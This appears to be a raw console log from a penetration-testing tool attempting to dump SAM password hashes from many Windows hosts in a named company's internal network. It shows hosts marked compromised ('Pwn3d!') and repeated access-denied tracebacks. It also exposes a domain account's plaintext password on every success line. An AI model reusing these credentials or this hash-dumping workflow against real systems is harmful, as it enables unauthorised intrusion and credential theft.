/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.69 445 OXOLT020001 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.141 445 OXODT031521 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.146 445 OXODT033421 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:26:57] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

[03:26:58] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯
DCERPCException: DCERPC Runtime Error: code: 0x5 -
rpc_s_access_denied

SMB 10.34.194.142 445 OXODT030611 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:26:59] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

[03:27:00] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.133 445 OXODT031531 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:01] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.134 445 OXODT031811 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:03] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.140 445 OXODT031941 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:06] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.130 445 OXODT0316131 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:09] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.132 445 OXODT033511 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:11] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

[03:27:14] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.135 445 OXODT033911 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.154 445 OXODT032611 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.147 445 OXODT031011 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.136 445 OXFDT030003 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.160 445 OXODT030911 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.139 445 OXODT030621 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.144 445 OXODT031931 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.131 445 OXODT030921 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.158 445 OXODT032711 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.143 445 OXODT031511 [-] Connection Error: [Errno
104] Connection reset by peer
[03:27:24] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
